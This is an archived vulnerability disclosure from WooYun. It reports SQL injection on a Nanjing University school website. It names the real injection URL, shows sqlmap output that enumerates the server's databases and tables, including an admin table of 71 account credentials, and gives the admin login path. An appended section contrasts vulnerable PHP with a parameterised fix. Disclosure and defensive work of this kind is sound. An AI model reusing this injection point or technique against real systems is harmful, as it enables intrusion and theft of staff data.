WooYun (WooYun.org) historical vulnerability archive --- http://wy.zone.ci/
2015-05-19: Details reported to the vendor, awaiting vendor handling
2015-05-19: Vendor confirmed; details disclosed to the vendor only
2015-05-29: Details disclosed to core white hats and relevant domain experts
2015-06-08: Details disclosed to regular white hats
2015-06-18: Details disclosed to intern white hats
2015-07-03: Details disclosed to the public
SQL injection in the School of Management and Engineering, Nanjing University, leaking partial personnel information
Injection point:
http://sme.nju.edu.cn/content/news_detail.php?id=89
I ran sqlmap on it directly, and it returned the server OS and the privilege level.
I didn't expect this many privileges! The database and table names it dumped are as follows:
---
[13:41:47] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.4.4, PHP 5.4.19
back-end DBMS: MySQL 5.0.12
[13:41:47] [INFO] fetching database names
[13:41:47] [INFO] the SQL query used returns 9 entries
[13:41:47] [INFO] resumed: information_schema
[13:41:47] [INFO] resumed: cdcol
[13:41:47] [INFO] resumed: mysql
[13:41:47] [INFO] resumed: performance_schema
[13:41:47] [INFO] resumed: phpmyadmin
[13:41:47] [INFO] resumed: smee
[13:41:47] [INFO] resumed: test
[13:41:47] [INFO] resumed: webauth
[13:41:48] [INFO] resumed: yuhonghai
[13:41:48] [INFO] fetching tables for databases: 'cdcol, informatima, phpmyadmin, smee, test, webauth, yuhonghai'
[13:41:48] [INFO] the SQL query used returns 154 entries
Database: cdcol [1 table]: cds
Database: phpmyadmin [12 tables]: pma_bookmark, pma_column_info, pma_designer_coords, pma_history, pma_pdf_pages, pma_recent, pma_relation, pma_table_coords, pma_table_info, pma_table_uiprefs, pma_tracking, pma_userconfig
Database: performance_schema [17 tables]: cond_instances, events_waits_current, events_waits_history, events_waits_history_long, events_waits_summary_by_instance, events_waits_summary_by_thread_by_event_name, events_waits_summary_global_by_event_name, file_instances, file_summary_by_event_name, file_summary_by_instance, mutex_instances, performance_timers, rwlock_instances, setup_consumers, setup_instruments, setup_timers, threads
Database: smee [26 tables]: admin, t_basic_info, t_category, t_cbzz, t_ddsm, t_fblw, t_gllt, t_hjqk, t_hzjl, t_jrlt, t_jrlt_bak, t_jszz, t_jxkc, t_kyxm, t_kyxm_gj, t_kyxm_hxyb, t_kyxm_hxzd, t_kyxm_sbj, t_news, t_rych, t_shzw, t_xydt, t_yjfx, t_zlfm, t_zlyl, t_zwmjjt
Database: yuhonghai [32 tables]: user, admin, football, kejian, news, notice, report, t_basic_info, t_category, t_cbzz, t_ddsm, t_fblw, t_gllt, t_hjqk, t_hzjl, t_jrlt, t_jrlt_bak, t_jszz, t_jxkc, t_kyxm, t_kyxm_gj, t_kyxm_hxyb, t_kyxm_hxzd, t_kyxm_sbj, t_news, t_rych, t_shzw, t_xydt, t_yjfx, t_zlfm, t_zlyl, t_zwmjjt
Database: webauth [1 table]: user_pwd
Database: mysql [24 tables]: user, columns_priv, db, event, func, general_log, help_category, help_keyword, help_relation, help_topic, host, ndb_binlog_index, plugin, proc, procs_priv, proxies_priv, servers, slow_log, tables_priv, time_zone, time_zone_leap_second, time_zone_name, time_zone_transition, time_zone_transition_type
Database: test [1 table]: t_news
Database: information_schema [40 tables]: CHARACTER_SETS, COLLATIONS, COLLATION_CHARACTER_SET_APPLICABILITY, COLUMNS, COLUMN_PRIVILEGES, ENGINES, EVENTS, FILES, GLOBAL_STATUS, GLOBAL_VARIABLES, INNODB_BUFFER_PAGE, INNODB_BUFFER_PAGE_LRU, INNODB_BUFFER_POOL_STATS, INNODB_CMP, INNODB_CMPMEM, INNODB_CMPMEM_RESET, INNODB_CMP_RESET, INNODB_LOCKS, INNODB_LOCK_WAITS, INNODB_TRX, KEY_COLUMN_USAGE, PARAMETERS, PARTITIONS, PLUGINS, PROCESSLIST, PROFILING, REFERENTIAL_CONSTRAINTS, ROUTINES, SCHEMATA, SCHEMA_PRIVILEGES, SESSION_STATUS, SESSION_VARIABLES, STATISTICS, TABLES, TABLESPACES, TABLE_CONSTRAINTS, TABLE_PRIVILEGES, TRIGGERS, USER_PRIVILEGES, VIEWS
I had a look at the data and found...
Database: smee
Table: admin
[71 entries]
Columns: user_name, user_pass
The leak is this serious... Finally, another look at the user accounts.
This is the admin back end:
http://sme.nju.edu.cn/content/admin/sem_user/admin_php/Login.php
What would I do with it anyway? It is possible to get in, but better not to damage a teaching system. Stopping here!
Filter keywords, and use SafeDog to block special characters!
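The suggested fix above relies on a WAF keyword filter, which only treats the symptom. The root cause for an endpoint like news_detail.php?id=... is that the id parameter reaches MySQL as SQL text, and the root fix is type validation plus a bound parameter. The block below is an added illustration, not the site's own code (its news_detail.php source is not on the page): the hypothetical vulnerable handler beside a hardened one; the connection details, the app_user account and the t_news column names are assumptions.

```php
<?php
// Added example, not the site's code. Connection details and the app_user account are
// placeholders. app_user should be a dedicated MySQL account holding only the privileges
// this page needs (SELECT on the relevant smee tables); the enumeration above shows the
// current account can read the phpmyadmin, mysql and webauth schemas as well.
$mysqli = new mysqli('localhost', 'app_user', 'PLACEHOLDER_PASSWORD', 'smee');
if ($mysqli->connect_errno) {
    http_response_code(500);
    exit('database unavailable');
}
$mysqli->set_charset('utf8mb4');

// VULNERABLE pattern (hypothetical): the raw query-string value is spliced into the SQL.
// Everything after "id=" becomes part of the statement, which is exactly what sqlmap uses.
function fetch_news_vulnerable(mysqli $db, array $get): ?array
{
    $id  = $get['id'] ?? '';
    $sql = "SELECT id, title, body, published_at FROM t_news WHERE id = " . $id;
    $res = $db->query($sql);
    return $res ? ($res->fetch_assoc() ?: null) : null;
}

// HARDENED pattern: validate the type first, then bind the value so the server treats it
// as data, never as SQL. No keyword blacklist is needed or relied upon.
function fetch_news_hardened(mysqli $db, array $get): ?array
{
    $id = filter_var($get['id'] ?? null, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($id === false) {
        return null;                      // reject non-numeric or out-of-range ids outright
    }
    $stmt = $db->prepare('SELECT id, title, body, published_at FROM t_news WHERE id = ?');
    if ($stmt === false) {
        return null;
    }
    $stmt->bind_param('i', $id);          // 'i' = integer placeholder
    $stmt->execute();
    $row = $stmt->get_result()->fetch_assoc();   // get_result() needs the mysqlnd driver
    $stmt->close();
    return $row ?: null;
}

$row = fetch_news_hardened($mysqli, $_GET);
if ($row === null) {
    http_response_code(404);
    exit('not found');
}
echo htmlspecialchars($row['title'], ENT_QUOTES, 'UTF-8');
```

With the hardened handler, a request whose id is not a positive integer is answered with 404 before any query runs, so there is nothing for a keyword filter to catch.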
Severity: High
Vulnerability Rank: 12
Confirmed at: 2015-05-19 16:27
We will notify the relevant departments to handle it.
None yet